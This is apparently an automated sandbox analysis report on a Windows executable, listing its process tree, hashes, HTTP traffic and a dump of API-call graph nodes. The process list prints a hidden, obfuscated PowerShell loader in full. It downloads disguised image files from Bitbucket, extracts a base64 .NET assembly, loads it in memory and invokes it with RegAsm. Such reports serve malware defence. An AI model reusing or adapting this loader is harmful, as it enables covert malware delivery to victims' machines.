                                                                                        X-Usage-Input-Ops: 0
                                                                                        X-Usage-Output-Ops: 0
                                                                                        Cache-Control: max-age=900
                                                                                        Age: 83
                                                                                        X-Cache: HIT
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Xss-Protection: 1; mode=block
                                                                                        Atl-Traceid: ec752bc7bf1e468fac49005661e35936
                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                        Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=2,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
                                                                                        Connection: close
                                                                                        2024-10-02 17:04:55 UTC | 12398 bytes | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="y+F3Ri7t30+2yS3vrtRQPg==">if (wind
                                                                                        2024-10-02 17:04:55 UTC | 2625 bytes | IN | Data Ascii: ui-in-frontbucket": true, "pipelines-deployments-settings-ui-in-frontbucket": true, "pipelines-runners-settings-ui-in-frontbucket": true, "pr-dependencies": false, "commit-expand-inno": false, "syntax-highlighting": false, "create-workspace-show-recaptcha



                                                                                        Target ID:0
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Users\user\Desktop\0XVZC3kfwL.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\0XVZC3kfwL.exe"
                                                                                        Imagebase:0x7ff681c20000
                                                                                        File size:192'512 bytes
                                                                                        MD5 hash:AF93D5A246B37CE552356E6B61C9AEC9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /c gam.bat
                                                                                        Imagebase:0x7ff78dd20000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:13:04:48
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:13:04:49
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#
C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#
G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:13:04:51
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:13:05:00
                                                                                        Start date:02/10/2024
                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                        Imagebase:0x7ff6b80e0000
                                                                                        File size:71'680 bytes
                                                                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:25%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:40.6%
                                                                                          Total number of Nodes:983
                                                                                          Total number of Limit Nodes:45
2349->2352 2351 7ff681c2333f 2350->2351 2358 7ff681c233c3 2350->2358 2356 7ff681c24f2c 24 API calls 2351->2356 2352->2351 2354 7ff681c2338c 2352->2354 2353 7ff681c23451 2353->2338 2360 7ff681c223c0 19 API calls 2353->2360 2367 7ff681c23479 2353->2367 2690 7ff681c26f14 2354->2690 2359 7ff681c2335d 2356->2359 2358->2353 2361 7ff681c2342d 2358->2361 2364 7ff681c233fd 2358->2364 2805 7ff681c27958 GetLastError 2359->2805 2360->2367 2718 7ff681c25f80 2361->2718 2363 7ff681c2349a 2363->2338 2368 7ff681c234b5 2363->2368 2369 7ff681c27d28 28 API calls 2364->2369 2365 7ff681c23362 2365->2338 2367->2363 2740 7ff681c241b4 2367->2740 2816 7ff681c24a54 2368->2816 2370 7ff681c23428 2369->2370 2370->2338 2806 7ff681c27984 2370->2806 2375 7ff681c26404 2374->2375 2376 7ff681c2643c LocalFree LocalFree 2375->2376 2377 7ff681c26419 SetFileAttributesA DeleteFileA 2375->2377 2384 7ff681c26463 2375->2384 2376->2375 2377->2376 2378 7ff681c26577 2380 7ff681c286f0 7 API calls 2378->2380 2379 7ff681c26501 2379->2378 2381 7ff681c2651d RegOpenKeyExA 2379->2381 2382 7ff681c22e0e 2380->2382 2381->2378 2383 7ff681c2654e RegDeleteValueA RegCloseKey 2381->2383 2382->2266 2382->2273 2388 7ff681c223c0 2382->2388 2383->2378 2384->2379 2385 7ff681c264e4 SetCurrentDirectoryA 2384->2385 2386 7ff681c27ea0 4 API calls 2384->2386 2387 7ff681c22034 16 API calls 2385->2387 2386->2385 2387->2379 2389 7ff681c22478 2388->2389 2390 7ff681c223d1 2388->2390 3070 7ff681c22234 GetWindowsDirectoryA 2389->3070 2392 7ff681c22471 2390->2392 2395 7ff681c223db 2390->2395 3067 7ff681c22308 RegOpenKeyExA 2392->3067 2394 7ff681c2246b 2394->2273 2395->2394 2396 7ff681c223eb RegOpenKeyExA 2395->2396 2396->2394 2397 7ff681c22420 RegQueryValueExA RegCloseKey 2396->2397 2397->2394 2399 7ff681c25105 2398->2399 2400 7ff681c24fa5 LoadStringA 2398->2400 2405 7ff681c286f0 7 API calls 2399->2405 2401 7ff681c24fcf 2400->2401 2402 7ff681c25011 2400->2402 2403 7ff681c28154 13 API calls 2401->2403 2404 7ff681c2508d 2402->2404 2413 
7ff681c2501d LocalAlloc 2402->2413 2407 7ff681c24fd4 2403->2407 2410 7ff681c250e6 LocalAlloc 2404->2410 2411 7ff681c250a0 LocalAlloc 2404->2411 2406 7ff681c22e7f 2405->2406 2406->2266 2406->2275 2408 7ff681c24fdd MessageBoxA 2407->2408 2409 7ff681c28084 2 API calls 2407->2409 2408->2399 2409->2408 2410->2399 2422 7ff681c25088 MessageBeep 2410->2422 2411->2399 2417 7ff681c250d1 2411->2417 2413->2399 2418 7ff681c25070 2413->2418 2421 7ff681c210bc _vsnprintf 2417->2421 2419 7ff681c210bc _vsnprintf 2418->2419 2419->2422 2420 7ff681c28154 13 API calls 2423 7ff681c25173 2420->2423 2421->2422 2422->2420 2424 7ff681c2517c MessageBoxA LocalFree 2423->2424 2425 7ff681c28084 2 API calls 2423->2425 2424->2399 2425->2424 2428 7ff681c21c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2427->2428 2431 7ff681c21c34 2427->2431 2429 7ff681c21cd4 ExitWindowsEx 2428->2429 2428->2431 2429->2431 2432 7ff681c21c50 2429->2432 2430 7ff681c24f2c 24 API calls 2430->2432 2431->2430 2433 7ff681c286f0 7 API calls 2432->2433 2434 7ff681c21d02 2433->2434 2434->2266 2436 7ff681c22f6b 2435->2436 2437 7ff681c25243 2435->2437 2436->2287 2436->2288 2437->2436 2438 7ff681c2524c FindResourceA LoadResource LockResource 2437->2438 2438->2436 2439 7ff681c2528b memcpy_s FreeResource 2438->2439 2439->2436 2441 7ff681c277de 2440->2441 2465 7ff681c2736a 2440->2465 2442 7ff681c286f0 7 API calls 2441->2442 2444 7ff681c230d9 2442->2444 2443 7ff681c27442 2443->2441 2446 7ff681c2745f GetModuleFileNameA 2443->2446 2444->2288 2444->2306 2445 7ff681c27395 CharNextA 2445->2465 2447 7ff681c27487 2446->2447 2448 7ff681c27494 2446->2448 2532 7ff681c27fb8 2447->2532 2448->2441 2450 7ff681c2794b 2544 7ff681c288c8 RtlCaptureContext RtlLookupFunctionEntry 2450->2544 2453 7ff681c274b0 CharUpperA 2454 7ff681c278e7 2453->2454 2453->2465 2541 7ff681c21bc0 2454->2541 2457 7ff681c278f8 CloseHandle 2458 7ff681c27904 ExitProcess 2457->2458 2459 7ff681c27615 CharUpperA 2459->2465 2460 7ff681c275be CompareStringA 2460->2465 
2461 7ff681c27673 CharUpperA 2461->2465 2462 7ff681c27548 CharUpperA 2462->2465 2463 7ff681c2770a CharUpperA 2463->2465 2464 7ff681c27f48 IsDBCSLeadByte CharNextA 2464->2465 2465->2441 2465->2443 2465->2445 2465->2450 2465->2453 2465->2459 2465->2460 2465->2461 2465->2462 2465->2463 2465->2464 2537 7ff681c27e08 2465->2537 2468 7ff681c286f9 2467->2468 2469 7ff681c22dfa 2468->2469 2470 7ff681c28750 RtlCaptureContext RtlLookupFunctionEntry 2468->2470 2469->2266 2469->2328 2471 7ff681c28795 RtlVirtualUnwind 2470->2471 2472 7ff681c287d7 2470->2472 2471->2472 2550 7ff681c28714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2472->2550 2478 7ff681c2203d 2475->2478 2479 7ff681c22213 2475->2479 2476 7ff681c22204 2477 7ff681c286f0 7 API calls 2476->2477 2477->2479 2478->2476 2480 7ff681c220cd FindFirstFileA 2478->2480 2479->2293 2480->2476 2488 7ff681c220ef 2480->2488 2481 7ff681c22129 lstrcmpA 2483 7ff681c22149 lstrcmpA 2481->2483 2484 7ff681c221ca FindNextFileA 2481->2484 2482 7ff681c22194 2485 7ff681c221a5 SetFileAttributesA DeleteFileA 2482->2485 2483->2484 2483->2488 2486 7ff681c221e6 FindClose RemoveDirectoryA 2484->2486 2484->2488 2485->2484 2486->2476 2487 7ff681c27e08 CharPrevA 2487->2488 2488->2481 2488->2482 2488->2484 2488->2487 2489 7ff681c22034 8 API calls 2488->2489 2489->2488 2495 7ff681c23d91 2490->2495 2497 7ff681c23d8a 2490->2497 2491 7ff681c23ffb 2493 7ff681c286f0 7 API calls 2491->2493 2492 7ff681c24f2c 24 API calls 2492->2491 2494 7ff681c2316a 2493->2494 2494->2293 2505 7ff681c21258 2494->2505 2495->2491 2495->2497 2498 7ff681c23ef5 2495->2498 2551 7ff681c22898 2495->2551 2497->2492 2498->2491 2498->2497 2499 7ff681c23fae MessageBeep 2498->2499 2564 7ff681c28154 2499->2564 2502 7ff681c23fca MessageBoxA 2502->2491 2506 7ff681c212a8 2505->2506 2507 7ff681c21421 2505->2507 2598 7ff681c21130 LoadLibraryA 2506->2598 2509 7ff681c286f0 7 API calls 2507->2509 2511 7ff681c21446 2509->2511 2511->2293 2524 7ff681c27d28 
FindResourceA 2511->2524 2512 7ff681c212b9 GetCurrentProcess OpenProcessToken 2512->2507 2513 7ff681c212e3 GetTokenInformation 2512->2513 2514 7ff681c2140c CloseHandle 2513->2514 2515 7ff681c2130c GetLastError 2513->2515 2514->2507 2515->2514 2516 7ff681c21321 LocalAlloc 2515->2516 2516->2514 2517 7ff681c2133e GetTokenInformation 2516->2517 2518 7ff681c21368 AllocateAndInitializeSid 2517->2518 2519 7ff681c213fd LocalFree 2517->2519 2518->2519 2522 7ff681c213b1 2518->2522 2519->2514 2520 7ff681c213ed FreeSid 2520->2519 2521 7ff681c213be EqualSid 2521->2522 2523 7ff681c213e2 2521->2523 2522->2520 2522->2521 2522->2523 2523->2520 2525 7ff681c27dc3 2524->2525 2526 7ff681c27d63 LoadResource 2524->2526 2528 7ff681c24f2c 24 API calls 2525->2528 2526->2525 2527 7ff681c27d7d DialogBoxIndirectParamA FreeResource 2526->2527 2527->2525 2531 7ff681c27de7 2527->2531 2529 7ff681c27de2 2528->2529 2529->2531 2531->2300 2533 7ff681c28029 2532->2533 2534 7ff681c27fd8 2532->2534 2533->2448 2535 7ff681c27fe0 IsDBCSLeadByte 2534->2535 2536 7ff681c28006 CharNextA 2534->2536 2535->2534 2536->2533 2536->2534 2538 7ff681c27e28 2537->2538 2538->2538 2539 7ff681c27e4c CharPrevA 2538->2539 2540 7ff681c27e3a 2538->2540 2539->2540 2540->2465 2542 7ff681c24f2c 24 API calls 2541->2542 2543 7ff681c21be7 2542->2543 2543->2457 2543->2458 2545 7ff681c28947 2544->2545 2546 7ff681c28905 RtlVirtualUnwind 2544->2546 2549 7ff681c28714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2545->2549 2546->2545 2552 7ff681c22a9a 2551->2552 2562 7ff681c228d5 2551->2562 2554 7ff681c22abf GlobalFree 2552->2554 2558 7ff681c22aaa 2552->2558 2554->2558 2555 7ff681c22908 GetFileVersionInfoSizeA 2556 7ff681c22926 GlobalAlloc 2555->2556 2555->2562 2557 7ff681c22946 GlobalLock 2556->2557 2556->2558 2557->2552 2559 7ff681c22961 GetFileVersionInfoA 2557->2559 2558->2498 2560 7ff681c22985 VerQueryValueA 2559->2560 2559->2562 2561 7ff681c22a59 GlobalUnlock 2560->2561 2560->2562 2561->2562 
2562->2552 2562->2555 2562->2561 2563 7ff681c22a3e GlobalUnlock 2562->2563 2579 7ff681c22644 2562->2579 2563->2554 2565 7ff681c28194 GetVersionExA 2564->2565 2573 7ff681c282c6 2564->2573 2568 7ff681c281bd 2565->2568 2565->2573 2566 7ff681c286f0 7 API calls 2567 7ff681c23fc1 2566->2567 2567->2502 2575 7ff681c28084 2567->2575 2569 7ff681c281e0 GetSystemMetrics 2568->2569 2568->2573 2570 7ff681c281f7 RegOpenKeyExA 2569->2570 2569->2573 2571 7ff681c2822c RegQueryValueExA RegCloseKey 2570->2571 2570->2573 2571->2573 2574 7ff681c28276 2571->2574 2572 7ff681c282b5 CharNextA 2572->2574 2573->2566 2574->2572 2574->2573 2576 7ff681c280aa EnumResourceLanguagesA 2575->2576 2577 7ff681c2812d 2575->2577 2576->2577 2578 7ff681c280ef EnumResourceLanguagesA 2576->2578 2577->2502 2578->2577 2580 7ff681c22849 GetSystemDirectoryA 2579->2580 2581 7ff681c22683 CharUpperA CharNextA CharNextA 2579->2581 2582 7ff681c22843 2580->2582 2583 7ff681c2282f GetSystemDirectoryA 2581->2583 2584 7ff681c226c4 2581->2584 2585 7ff681c27e08 CharPrevA 2582->2585 2588 7ff681c2286a 2582->2588 2583->2582 2586 7ff681c22819 GetWindowsDirectoryA 2584->2586 2587 7ff681c226ce 2584->2587 2585->2588 2586->2582 2590 7ff681c27e08 CharPrevA 2587->2590 2589 7ff681c286f0 7 API calls 2588->2589 2591 7ff681c22879 2589->2591 2592 7ff681c2272d RegOpenKeyExA 2590->2592 2591->2562 2592->2582 2593 7ff681c22760 RegQueryValueExA 2592->2593 2594 7ff681c22806 RegCloseKey 2593->2594 2595 7ff681c22793 2593->2595 2594->2582 2596 7ff681c2279c ExpandEnvironmentStringsA 2595->2596 2597 7ff681c227ba 2595->2597 2596->2597 2597->2594 2599 7ff681c21229 2598->2599 2600 7ff681c21185 GetProcAddress 2598->2600 2603 7ff681c286f0 7 API calls 2599->2603 2601 7ff681c2121a FreeLibrary 2600->2601 2602 7ff681c211a3 AllocateAndInitializeSid 2600->2602 2601->2599 2602->2601 2604 7ff681c211ec FreeSid 2602->2604 2605 7ff681c21238 2603->2605 2604->2601 2605->2507 2605->2512 2608 7ff681c251f8 7 API calls 2607->2608 2609 7ff681c262af LocalAlloc 2608->2609 
2610 7ff681c262fb 2609->2610 2611 7ff681c262cd 2609->2611 2612 7ff681c251f8 7 API calls 2610->2612 2613 7ff681c24f2c 24 API calls 2611->2613 2615 7ff681c2630d 2612->2615 2614 7ff681c262eb 2613->2614 2829 7ff681c27958 GetLastError 2614->2829 2617 7ff681c2634a lstrcmpA 2615->2617 2618 7ff681c26311 2615->2618 2620 7ff681c2637a 2617->2620 2621 7ff681c26364 LocalFree 2617->2621 2619 7ff681c24f2c 24 API calls 2618->2619 2622 7ff681c2632f LocalFree 2619->2622 2623 7ff681c24f2c 24 API calls 2620->2623 2624 7ff681c2324b 2621->2624 2622->2624 2625 7ff681c2639c LocalFree 2623->2625 2624->2329 2624->2331 2624->2338 2626 7ff681c262f0 2625->2626 2626->2624 2628 7ff681c251f8 7 API calls 2627->2628 2629 7ff681c261f1 2628->2629 2630 7ff681c261f6 2629->2630 2631 7ff681c2623a 2629->2631 2632 7ff681c24f2c 24 API calls 2630->2632 2633 7ff681c251f8 7 API calls 2631->2633 2635 7ff681c26215 2632->2635 2634 7ff681c26253 2633->2634 2636 7ff681c27984 13 API calls 2634->2636 2637 7ff681c2326e 2635->2637 2638 7ff681c2625f 2636->2638 2637->2338 2641 7ff681c268f0 2637->2641 2638->2637 2639 7ff681c26263 2638->2639 2640 7ff681c24f2c 24 API calls 2639->2640 2640->2635 2642 7ff681c251f8 7 API calls 2641->2642 2643 7ff681c26932 LocalAlloc 2642->2643 2644 7ff681c26982 2643->2644 2645 7ff681c26952 2643->2645 2647 7ff681c251f8 7 API calls 2644->2647 2646 7ff681c24f2c 24 API calls 2645->2646 2648 7ff681c26970 2646->2648 2649 7ff681c26994 2647->2649 2854 7ff681c27958 GetLastError 2648->2854 2651 7ff681c26998 2649->2651 2652 7ff681c269d1 lstrcmpA LocalFree 2649->2652 2656 7ff681c24f2c 24 API calls 2651->2656 2653 7ff681c26a18 2652->2653 2654 7ff681c26a63 2652->2654 2662 7ff681c26710 53 API calls 2653->2662 2659 7ff681c26d40 2654->2659 2661 7ff681c26a7b GetTempPathA 2654->2661 2655 7ff681c26975 2658 7ff681c2697b 2655->2658 2657 7ff681c269b6 LocalFree 2656->2657 2657->2658 2663 7ff681c286f0 7 API calls 2658->2663 2660 7ff681c27d28 28 API calls 2659->2660 2660->2658 2664 7ff681c26a9e 2661->2664 2671 
